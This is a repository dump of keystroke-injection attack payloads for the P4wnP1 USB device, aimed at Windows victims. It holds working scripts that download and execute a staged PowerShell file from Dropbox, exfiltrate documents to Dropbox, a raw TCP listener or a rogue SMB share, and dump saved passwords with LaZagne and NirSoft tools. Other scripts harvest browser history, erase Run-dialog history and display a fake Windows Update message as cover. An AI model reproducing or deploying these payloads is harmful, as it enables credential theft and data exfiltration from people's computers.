├── Dropbox Exfiltration - Stealing files with Staged Powershell Payloads ├── demo.gif ├── exfil.ps1 ├── payload.js └── readme.md ├── Extract All Usernames & Passwords ├── Extract All Usernames & Passwords.js ├── TheRealAnnoyance.bat ├── invisible.vbs └── readme.md ├── One Line Powershell Wallpaper Changer ├── Line Powershell Wallpaper Changer.js ├── README.md ├── demo.gif └── wall.jpg ├── PasswordGrabber ├── PasswordGrabber.js ├── payload.ps1 └── readme.md ├── Powershell_TCP_Extractor ├── copyMoveData.ps1 ├── d.cmd ├── demo.gif ├── payload.js └── readme.md ├── SMB Exfiltrator ├── SMB_PAYLOAD.ps1 ├── payload.js └── readme.md ├── SmartFileExtract Exfiltrator ├── README.md ├── SmartFileExtract Exfiltration.js ├── d.cmd ├── demo.gif ├── e.cmd └── i.vbs ├── browserData ├── GetData.ps1 ├── demo.gif ├── payload.js └── readme.md └── lightning speed.js /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/demo.gif -------------------------------------------------------------------------------- /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/exfil.ps1: -------------------------------------------------------------------------------- 1 | Compress-Archive -Path $env:USERPROFILE\Documents\*.docx -CompressionLevel NoCompression -DestinationPath $env:TMP\$env:USERNAME-$(get-date -f yyyy-MM-dd).zip 2 | $TargetFilePath="/$env:USERNAME-$(get-date -f yyyy-MM-dd).zip" 3 | $SourceFilePath="$env:TMP\$env:USERNAME-$(get-date -f yyyy-MM-dd).zip" 4 | $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' 5 | $authorization = "Bearer " + "PASTE YOUR Dropbox access token link" 6 | $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" 7 | $headers.Add("Authorization", $authorization) 8 | $headers.Add("Dropbox-API-Arg", $arg) 9 | $headers.Add("Content-Type", 'application/octet-stream') 10 | Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers 11 | rm $SourceFilePath -------------------------------------------------------------------------------- /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/payload.js: -------------------------------------------------------------------------------- 1 | 2 | //Dropbox Exfiltration - Stealing files with Staged Powershell Payloads 3 | layout('us'); 4 | typingSpeed(10,10) 5 | press("GUI r"); 6 | delay(500); 7 | type("powershell -w h -NoP -NonI -Exec Bypass \"$e=\\\"$env:TMP/e.ps1\\\";iwr (https://PASTE YOUR Dropbox link) -O $e;iex $e;rm $e\"\n") 8 | delay(1000); 9 | -------------------------------------------------------------------------------- /Dropbox Exfiltration - Stealing files with Staged Powershell Payloads/readme.md: -------------------------------------------------------------------------------- 1 | # Dropbox Exfiltrator 2 | 3 | 4 | This payload is not robust and is meant for demonstration purposes only. Known issues include the 150 MB file chunking limitation with Dropbox, as well as the IWR/IEX method and compression overhead. Please feel free to clean up. 5 | Description 6 | 7 | Staged powershell payload which downloads and executes exfil.ps1 from dropbox which compresses the users documents folder and uploads it to dropbox. 8 | Requirements 9 | 10 | Step 1. Create a Dropbox app using their API and generate an access token from https://www.dropbox.com/developers/apps/create 11 | Step 2. Customize the powershell exfil.ps1 file to exfiltrate the loot to Dropbox using the token generated above 12 | Step 3. Get a direct dropbox link for the powershell file (right-click exfil.ps1, get dropbox link, replace dl=0 with dl=1) 13 | Step 4. Customize the exfiltration payload.txt to use the dropbox link from above 14 | 15 | 16 | ![](./demo.gif) 17 | -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/Extract All Usernames & Passwords.js: -------------------------------------------------------------------------------- 1 | layout("us"); // US keyboard layout 2 | press("WIN"); 3 | delay(250); 4 | type("powershell"); 5 | delay(250); 6 | press("CTRL SHIFT ENTER"); 7 | delay(1500); 8 | press("ALT y"); 9 | delay(2000); 10 | type("$usbPath =((gwmi win32_volume -f 'label=''P4WNP1''').Name+'Tools\')\n"); 11 | delay(250); 12 | type("cd $usbPath\n"); 13 | delay(250); 14 | type("Expand-Archive Private.zip\n"); 15 | delay(2000); 16 | type("cd Private\n"); 17 | delay(250); 18 | type("C:/windows/System32/wscript.exe invisible.vbs TheRealAnnoyance.bat\n"); 19 | delay(2500); 20 | type("exit\n"); 21 | delay(250); -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/TheRealAnnoyance.bat: -------------------------------------------------------------------------------- 1 | timeout 3 2 | %~dp0/WebBrowserPassView.exe /stext WebBrowserPassView.txt 3 | %~dp0/SkypeLogView.exe /stext SkypeLogView.txt 4 | %~dp0/RouterPassView.exe /stext RouterPassView.txt 5 | %~dp0/pspv.exe /stext pspv.txt 6 | %~dp0/PasswordFox.exe /stext PasswordFox.txt 7 | %~dp0/OperaPassView.exe /stext OperaPassView.txt 8 | %~dp0/mspass.exe /stext mspass.txt 9 | %~dp0/mailpv.exe /stext mailpv.txt 10 | %~dp0/iepv.exe /stext iepv.txt 11 | %~dp0/ChromePass.exe /stext ChromePass.txt 12 | %~dp0/ChromeHistoryView.exe /stext ChromeHistoryView.txt 13 | %~dp0/BulletsPassView.exe /stext BulletsPassView.txt 14 | %~dp0/BrowsingHistoryView.exe /stext BrowsingHistoryView.txt 15 | %~dp0/WirelessKeyView.exe /stext WirelessKeyView.txt 16 | %~dp0/netpass.exe /stext netpass.txt 17 | %~dp0/Dialupass.exe /stext Dialupass.txt 18 | %~dp0/WirelessKeyView.exe /stext WirelessKeyView.txt 19 | 20 | del /S WebBrowserPassView.exe && ECHO Y 21 | del /S SkypeLogView.exe && ECHO Y 22 | del /S RouterPassView.exe && ECHO Y 23 | del /S pspv.exe && ECHO Y 24 | del /S PasswordFox.exe && ECHO Y 25 | del /S OperaPassView.exe && ECHO Y 26 | del /S mspass.exe && ECHO Y 27 | del /S mailpv.exe && ECHO Y 28 | del /S iepv.exe && ECHO Y 29 | del /S ChromePass.exe && ECHO Y 30 | del /S ChromeHistoryView.exe && ECHO Y 31 | del /S BulletsPassView.exe && ECHO Y 32 | del /S BrowsingHistoryView.exe && ECHO Y 33 | del /S WirelessKeyView.exe && ECHO Y 34 | del /S netpass.exe && ECHO Y 35 | del /S Dialupass.exe && ECHO Y 36 | del /S SniffPass.exe && ECHO Y 37 | del /S PasswordFox64.exe && ECHO Y 38 | del /S invisible.vbs && ECHO Y 39 | del /S TheRealAnnoyance.bat && ECHO Y 40 | 41 | 42 | -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/invisible.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /Extract All Usernames & Passwords/readme.md: -------------------------------------------------------------------------------- 1 | # Extract All Usernames & Passwords 2 | ![alt tag](https://pbs.twimg.com/profile_images/2985303821/f913499629cb67c4277af708404504e3_400x400.jpeg) 3 | ## Description 4 | powerful little tools and created an executable batch file extract any Wi-Fi, internet browser, mail account, Windows Login, Skype, Remote Desktop, Windows bullet form, messenger, LAN, router and many more usernames and passwords that are saved in a computer that you’re going to be using this USB mass storage 5 | 6 | Private zip Download link https://tinyurl.com/y3pdajm5 7 | password 12345 8 | You need to download the lastest file from http://www.nirsoft.net/password_recovery_tools.html 9 | -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/Line Powershell Wallpaper Changer.js: -------------------------------------------------------------------------------- 1 | //One Line Powershell Wallpaper Changer 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type(" powershell -w h \"$p=$home+'\\b.jpg';iwr https://bit.ly/2SrQzNT -O $p;SP 'HKCU:Control Panel\\Desktop' WallPaper $p;1..59|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\"\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/README.md: -------------------------------------------------------------------------------- 1 | # One Line Powershell Wallpaper Changer 2 | ![](./wall.jpg) 3 | ## Description 4 | Single stage powershell one-liner executes from run dialog. CMD opens a hide powershell window which downloads b.jpg (change this URL) to C:\Users\Username then sets the registry entry to change the wallpaper, then finally loops over an undocumented USER32.DLL feature for 60 seconds to force a user profile ref 5 | 6 | ## Demo 7 | ![](./demo.gif) 8 | -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/One Line Powershell Wallpaper Changer/demo.gif -------------------------------------------------------------------------------- /One Line Powershell Wallpaper Changer/wall.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/One Line Powershell Wallpaper Changer/wall.jpg -------------------------------------------------------------------------------- /PasswordGrabber/PasswordGrabber.js: -------------------------------------------------------------------------------- 1 | layout('us'); // US keyboard layout 2 | typingSpeed(0,0) 3 | press("GUI r"); 4 | delay(500); 5 | type("cmd /C start /MIN powershell -executionpolicy Bypass .((gwmi win32_volume -f 'label=''P4WNP1''').Name+'\\payload\\payload.ps1')\n") 6 | delay(1000); 7 | -------------------------------------------------------------------------------- /PasswordGrabber/payload.ps1: -------------------------------------------------------------------------------- 1 | $dest = ((Get-WmiObject win32_volume -f 'label=''P4WNP1''').Name+'loot\PasswordGrabber') 2 | $filter = 'password_'+ $env:COMPUTERNAME 3 | $filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1) 4 | Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''P4WNP1''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt') 5 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 6 | -------------------------------------------------------------------------------- /PasswordGrabber/readme.md: -------------------------------------------------------------------------------- 1 | 2 | # PasswordGrabber 3 | ![alt tag](https://pngimage.net/wp-content/uploads/2018/06/hand-cursor-icon-png-6.png) 4 | 5 | 6 | Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... 7 | 8 | ## Description 9 | The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software. 10 | 11 | Full read here https://github.com/AlessandroZ/LaZagne 12 | 13 | ### Configuration 14 | 15 | 1. You need to download the lastest file from LaZagne release page.https://github.com/AlessandroZ/LaZagne 16 | 2. Drive name should be"P4WNP1".Add 3 folders. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe 17 | 18 | 19 | https://ibb.co/3cyLcF7 20 | https://ibb.co/YymT7WQ 21 | 22 | i'm not responsible on usage you do with it this is for eduational purpose only 23 | 24 | ## remember all my payloads are in US kerboard layout 25 | -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/copyMoveData.ps1: -------------------------------------------------------------------------------- 1 | #edit ip and port of your listener... listener is on the machine you want to send data to... I use netcat as listener... (example command on kali.. [nc -l -p 54321 > out.file]) 2 | [int] $Port = 54321 3 | $IP = "172.16.0.1" 4 | #edit this to specify your target 5 | #$rootFolder = "$ENV:UserProfile\Documents" 6 | $rootFolder = "E:\" 7 | #edit include to specify filetypes...(*.doc*,*.txt,*.jpg) whatevs... 8 | $files = Get-ChildItem -Path $rootFolder -Include *.txt -Recurse 9 | 10 | #only edit under this if you know what you are doing 11 | #temp location to perform file copy and zip 12 | $tempFolderRoot = $env:APPDATA 13 | $tempFolderFinal = $tempFolderRoot+"\"+$env:UserName+"-Docs" 14 | New-Item -ItemType directory -Path $tempFolderFinal -Force 15 | foreach($file in $files) 16 | {Copy-Item "$file" -destination $tempFolderFinal} 17 | $CompressionToUse = [System.IO.Compression.CompressionLevel]::Fastest 18 | $IncludeBaseFolder = $false 19 | $zipTo = "{0}\{1}.zip" -f $tempFolderRoot,"ZIPPED" 20 | [Reflection.Assembly]::LoadWithPartialName( "System.IO.Compression.FileSystem" ) 21 | [System.IO.Compression.ZipFile]::CreateFromDirectory($tempFolderFinal, $ZipTo, $CompressionToUse, $IncludeBaseFolder) 22 | $Address = [system.net.IPAddress]::Parse($IP) 23 | $socket = new-object System.Net.Sockets.TcpClient 24 | $socket.connect($Address, $port) 25 | $stream = $socket.GetStream() 26 | $file = Get-Item $Env:APPDATA\ZIPPED.zip 27 | $fileData = [IO.File]::ReadAllBytes($file) 28 | $stream.Write($fileData, 0, $fileData.Length) 29 | $stream.Close() 30 | $Socket.Close() 31 | 32 | #clean up temp files 33 | Remove-Item $tempFolderFinal -RECURSE 34 | Remove-Item $Env:APPDATA\ZIPPED.zip 35 | -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | Rem run powershell script with bypass,nologo, and hidden flag 4 | Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1 5 | 6 | REM Delete registry key storing Run dialog history...to clean up evidence 7 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 8 | 9 | @cls 10 | @exit -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/Powershell_TCP_Extractor/demo.gif -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/payload.js: -------------------------------------------------------------------------------- 1 | //Powershell_TCP_Extractor 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("powershell -w h \".((gwmi win32_volume -f 'label=''P4WNP1''').Name+'Powershell_TCP_Extractor\\d.cmd')\"\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /Powershell_TCP_Extractor/readme.md: -------------------------------------------------------------------------------- 1 | # Powershell TCP extractor 2 | 3 | 4 | ## Description 5 | 6 | Copies data to temp directory and uses powershell tcp socket to extract to a listener on remote machine 7 | 8 | ## Output 9 | 10 | nc -l -p 54321 > ZIPPED.zip 11 | 12 | ## demo 13 | ![](./demo.gif) 14 | -------------------------------------------------------------------------------- /SMB Exfiltrator/SMB_PAYLOAD.ps1: -------------------------------------------------------------------------------- 1 | $exfil_dir="$Env:UserProfile\Documents" 2 | $exfil_ext="*.docx" 3 | $loot_dir="\\172.16.0.1\Data\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))" 4 | net use \\172.16.0.1\Data /USER:any any; 5 | mkdir $loot_dir 6 | robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z 7 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 8 | -------------------------------------------------------------------------------- /SMB Exfiltrator/payload.js: -------------------------------------------------------------------------------- 1 | //SMB_PAYLOAD 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("cmd /C start /MIN powershell -executionpolicy Bypass .((gwmi win32_volume -f 'label=''P4WNP1''').Name+'\\payload\\SMB_PAYLOAD.ps1')\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /SMB Exfiltrator/readme.md: -------------------------------------------------------------------------------- 1 | 2 | # Faster SMB Exfiltrator 3 | 4 | 5 | ## Description 6 | 7 | Exfiltrates select files from users's documents folder via SMB. 8 | Liberated documents will reside in PWNPI loot directory under /Data/HOSTNAME/DATE_TIME 9 | 10 | * Faster copying, using robocopy multithreaded mode 11 | * Faster finish, using a EXFILTRATION_COMPLETE file 12 | * Offload logic to target PC for accurate date/time 13 | * Clears tracks by default without second run dialog 14 | * Hidden powershell window by default 15 | 16 | ## REQUIREMENTS 17 | 18 | 1. Download impacket from https://github.com/CoreSecurity/impacket 19 | 2. goto cd impacket/ 20 | 3. install "python setup.py install" 21 | 22 | ## Configuration 23 | 1.create folder root directory mkdir /Data give full permissions chmod +x /Data 24 | 25 | 2.goto impacket/examples run this command "./smbserver.py -comment 'My share' -username any -password any -smb2support Data /Datasmbserver.py -comment 'My share' -username any -password any -smb2support Data /Data" 26 | 27 | 3.Configured to copy .docx files by default. Change $exfil_ext in s.ps1 to desired. 28 | 29 | 30 | 31 | ## i'm not responsible on usage you do with it this is for eduational purpose only 32 | 33 | ## remember all my payloads are in US kerboard layout 34 | -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/README.md: -------------------------------------------------------------------------------- 1 | # SmartFileExtract Exfiltrator 2 | SmartFileExtract is a find-and-copy utility written specifically for the Hak5 BashBunny but also is usable as a standalone utility. Files are found by standard patterns (including wildcards) and then copied to any valid path. 3 | 4 | - Finds all files with a) the word secret or pass in the filename as well as b) any DOCX files 5 | - Reports status as a fake install window 6 | - Stops extract after 90 seconds or 500 MBs 7 | 8 | Setup: 9 | - Download the SmartFileExtract utility from https://github.com/saintcrossbow/SmartFileExtract 10 | * Quick tip: you only need the SmartFileExtract.exe from the project copy to "P4WNP1" SmartFile\ 11 | 12 | 13 | ## File Extensions 14 | 15 | 1 *.DOC and .DOCX Microsoft Word documents. 16 | 2 *.PDF PDF files 17 | 3 *.XLS and .XLSX Microsoft Excel 18 | 4 *.PPT and .PPTX Microsoft PowerPoint 19 | 20 | 21 | ![](./demo.gif) 22 | -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/SmartFileExtract Exfiltration.js: -------------------------------------------------------------------------------- 1 | SmartFileExtract Forensics and Exfiltration 2 | layout('us'); // US keyboard layout 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("cmd /C start /MIN powershell -executionpolicy Bypass .((gwmi win32_volume -f 'label=''P4WNP1''').Name+'\\SmartFile\\d.cmd')\n") 7 | delay(1000); -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/d.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell" 3 | cscript %~dp0\i.vbs %~dp0\e.cmd 4 | @exit -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/SmartFileExtract Exfiltrator/demo.gif -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/e.cmd: -------------------------------------------------------------------------------- 1 | REM Setup required: 2 | REM o Create SFE in the loot directory 3 | REM o Place SmartFileExtract on the root of the bashbunny 4 | @echo off 5 | @echo Installing Windows Update 6 | 7 | REM Delete registry keys storing Run dialog history 8 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 9 | 10 | REM Creates directory compromised of computer name, date and time 11 | REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious 12 | set dst=%~dp0\..\..\loot\SFE\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% 13 | mkdir %dst% >>nul 14 | 15 | 16 | if Exist %USERPROFILE%\Documents ( %~dp0\..\..\SmartFile\SmartFileExtract.exe /drive d /file *.doc;*pass*.*;*secret* /copyto %dst% /curtain 3 /maxsec 90 /maxmbs 500 >>nul ) 17 | 18 | REM Blink CAPSLOCK key 19 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 20 | 21 | @cls 22 | @exit -------------------------------------------------------------------------------- /SmartFileExtract Exfiltrator/i.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /browserData/GetData.ps1: -------------------------------------------------------------------------------- 1 | function Get-BrowserInformation { 2 | <# 3 | .SYNOPSIS 4 | 5 | Dumps Browser Information 6 | Author: @424f424f 7 | License: BSD 3-Clause 8 | Required Dependencies: None 9 | Optional Dependencies: None 10 | 11 | .DESCRIPTION 12 | 13 | Enumerates browser history or bookmarks for a Chrome, Internet Explorer, 14 | and/or Firefox browsers on Windows machines. 15 | 16 | .PARAMETER Browser 17 | 18 | The type of browser to enumerate, 'Chrome', 'IE', 'Firefox' or 'All' 19 | 20 | .PARAMETER Datatype 21 | 22 | Type of data to enumerate, 'History' or 'Bookmarks' 23 | 24 | .PARAMETER UserName 25 | 26 | Specific username to search browser information for. 27 | 28 | .PARAMETER Search 29 | 30 | Term to search for 31 | 32 | .EXAMPLE 33 | 34 | PS C:\> Get-BrowserInformation 35 | 36 | Enumerates browser information for all supported browsers for all current users. 37 | 38 | .EXAMPLE 39 | 40 | PS C:\> Get-BrowserInformation -Browser IE -Datatype Bookmarks -UserName user1 41 | 42 | Enumerates bookmarks for Internet Explorer for the user 'user1'. 43 | 44 | .EXAMPLE 45 | 46 | PS C:\> Get-BrowserInformation -Browser All -Datatype History -UserName user1 -Search 'github' 47 | 48 | Enumerates bookmarks for Internet Explorer for the user 'user1' and only returns 49 | results matching the search term 'github'. 50 | #> 51 | [CmdletBinding()] 52 | Param 53 | ( 54 | [Parameter(Position = 0)] 55 | [String[]] 56 | [ValidateSet('Chrome','IE','FireFox', 'All')] 57 | $Browser = 'All', 58 | 59 | [Parameter(Position = 1)] 60 | [String[]] 61 | [ValidateSet('History','Bookmarks','All')] 62 | $DataType = 'All', 63 | 64 | [Parameter(Position = 2)] 65 | [String] 66 | $UserName = '', 67 | 68 | [Parameter(Position = 3)] 69 | [String] 70 | $Search = '' 71 | ) 72 | 73 | 74 | 75 | function ConvertFrom-Json20([object] $item){ 76 | #http://stackoverflow.com/a/29689642 77 | Add-Type -AssemblyName System.Web.Extensions 78 | $ps_js = New-Object System.Web.Script.Serialization.JavaScriptSerializer 79 | return ,$ps_js.DeserializeObject($item) 80 | 81 | } 82 | 83 | function Get-ChromeHistory { 84 | $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History" 85 | if (-not (Test-Path -Path $Path)) { 86 | Write-Verbose "[!] Could not find Chrome History for username: $UserName" 87 | } 88 | $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 89 | $Value = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History"|Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 90 | $Value | ForEach-Object { 91 | $Key = $_ 92 | if ($Key -match $Search){ 93 | New-Object -TypeName PSObject -Property @{ 94 | User = $UserName 95 | Browser = 'Chrome' 96 | DataType = 'History' 97 | Data = $_ 98 | } 99 | } 100 | } 101 | } 102 | 103 | function Get-ChromeBookmarks { 104 | $Path = "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" 105 | if (-not (Test-Path -Path $Path)) { 106 | Write-Verbose "[!] Could not find FireFox Bookmarks for username: $UserName" 107 | } else { 108 | $Json = Get-Content $Path 109 | $Output = ConvertFrom-Json20($Json) 110 | $Jsonobject = $Output.roots.bookmark_bar.children 111 | $Jsonobject.url |Sort -Unique | ForEach-Object { 112 | if ($_ -match $Search) { 113 | New-Object -TypeName PSObject -Property @{ 114 | User = $UserName 115 | Browser = 'Firefox' 116 | DataType = 'Bookmark' 117 | Data = $_ 118 | } 119 | } 120 | } 121 | } 122 | } 123 | 124 | function Get-InternetExplorerHistory { 125 | #https://crucialsecurityblog.harris.com/2011/03/14/typedurls-part-1/ 126 | 127 | $Null = New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS 128 | $Paths = Get-ChildItem 'HKU:\' -ErrorAction SilentlyContinue | Where-Object { $_.Name -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } 129 | 130 | ForEach($Path in $Paths) { 131 | 132 | $User = ([System.Security.Principal.SecurityIdentifier] $Path.PSChildName).Translate( [System.Security.Principal.NTAccount]) | Select -ExpandProperty Value 133 | 134 | $Path = $Path | Select-Object -ExpandProperty PSPath 135 | 136 | $UserPath = "$Path\Software\Microsoft\Internet Explorer\TypedURLs" 137 | if (-not (Test-Path -Path $UserPath)) { 138 | Write-Verbose "[!] Could not find IE History for SID: $Path" 139 | } 140 | else { 141 | Get-Item -Path $UserPath -ErrorAction SilentlyContinue | ForEach-Object { 142 | $Key = $_ 143 | $Key.GetValueNames() | ForEach-Object { 144 | $Value = $Key.GetValue($_) 145 | if ($Value -match $Search) { 146 | New-Object -TypeName PSObject -Property @{ 147 | User = $UserName 148 | Browser = 'IE' 149 | DataType = 'History' 150 | Data = $Value 151 | } 152 | } 153 | } 154 | } 155 | } 156 | } 157 | } 158 | 159 | function Get-InternetExplorerBookmarks { 160 | $URLs = Get-ChildItem -Path "$Env:systemdrive\Users\" -Filter "*.url" -Recurse -ErrorAction SilentlyContinue 161 | ForEach ($URL in $URLs) { 162 | if ($URL.FullName -match 'Favorites') { 163 | $User = $URL.FullName.split('\')[2] 164 | Get-Content -Path $URL.FullName | ForEach-Object { 165 | try { 166 | if ($_.StartsWith('URL')) { 167 | # parse the .url body to extract the actual bookmark location 168 | $URL = $_.Substring($_.IndexOf('=') + 1) 169 | 170 | if($URL -match $Search) { 171 | New-Object -TypeName PSObject -Property @{ 172 | User = $User 173 | Browser = 'IE' 174 | DataType = 'Bookmark' 175 | Data = $URL 176 | } 177 | } 178 | } 179 | } 180 | catch { 181 | Write-Verbose "Error parsing url: $_" 182 | } 183 | } 184 | } 185 | } 186 | } 187 | 188 | function Get-FireFoxHistory { 189 | $Path = "$Env:systemdrive\Users\$UserName\AppData\Roaming\Mozilla\Firefox\Profiles\" 190 | if (-not (Test-Path -Path $Path)) { 191 | Write-Verbose "[!] Could not find FireFox History for username: $UserName" 192 | } 193 | else { 194 | $Profiles = Get-ChildItem -Path "$Path\*.default\" -ErrorAction SilentlyContinue 195 | $Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 196 | $Value = Get-Content $Profiles\places.sqlite | Select-String -Pattern $Regex -AllMatches |Select-Object -ExpandProperty Matches |Sort -Unique 197 | $Value.Value |ForEach-Object { 198 | if ($_ -match $Search) { 199 | ForEach-Object { 200 | New-Object -TypeName PSObject -Property @{ 201 | User = $UserName 202 | Browser = 'Firefox' 203 | DataType = 'History' 204 | Data = $_ 205 | } 206 | } 207 | } 208 | } 209 | } 210 | } 211 | 212 | if (!$UserName) { 213 | $UserName = "$ENV:USERNAME" 214 | } 215 | 216 | if(($Browser -Contains 'All') -or ($Browser -Contains 'Chrome')) { 217 | if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { 218 | Get-ChromeHistory 219 | } 220 | if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) { 221 | Get-ChromeBookmarks 222 | } 223 | } 224 | 225 | if(($Browser -Contains 'All') -or ($Browser -Contains 'IE')) { 226 | if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { 227 | Get-InternetExplorerHistory 228 | } 229 | if (($DataType -Contains 'All') -or ($DataType -Contains 'Bookmarks')) { 230 | Get-InternetExplorerBookmarks 231 | } 232 | } 233 | 234 | if(($Browser -Contains 'All') -or ($Browser -Contains 'FireFox')) { 235 | if (($DataType -Contains 'All') -or ($DataType -Contains 'History')) { 236 | Get-FireFoxHistory 237 | } 238 | } 239 | } 240 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue -------------------------------------------------------------------------------- /browserData/demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/akhil1136/P4wnP1-ALOA-payloads/bf0b0b303e8a1e40353fa0622af7852516193e20/browserData/demo.gif -------------------------------------------------------------------------------- /browserData/payload.js: -------------------------------------------------------------------------------- 1 | //BrowserData History 2 | layout('us'); 3 | typingSpeed(0,0) 4 | press("GUI r"); 5 | delay(500); 6 | type("powershell -w h \".((gwmi win32_volume -f 'label=''P4WNP1''').Name+'browserData\\GetData.ps1')\"; $b =(gwmi win32_volume -f 'label=''P4WNP1''' | Select-Object -ExpandProperty DriveLetter); Get-BrowserInformation | Out-File -Append $b\\loot\\$env:computername.txt\"\n") 7 | delay(1000); 8 | -------------------------------------------------------------------------------- /browserData/readme.md: -------------------------------------------------------------------------------- 1 | ## BrowserData History Exfiltration 2 | 3 | 4 | ## Demo 5 | ![](./demo.gif) -------------------------------------------------------------------------------- /lightning speed.js: -------------------------------------------------------------------------------- 1 | //lightning speed move powershell or cmd 2 | function win10AsAdmin() { 3 | press("GUI"); //open search 4 | delay(200); 5 | type("powershell"); //powershell 6 | delay(500); // wait for search to finish 7 | press("CTRL SHIFT ENTER"); //start with CTRL+SHIFT+ENTER (run as admin) 8 | delay(1000); //wait for confirmation dialog (no check if a password is required, assume login user is admin) 9 | press("SHIFT TAB"); //switch to dialog confirmation 10 | press("ENTER"); 11 | } 12 | win10AsAdmin(); 13 | delay(1000); 14 | press("ALT SPACE 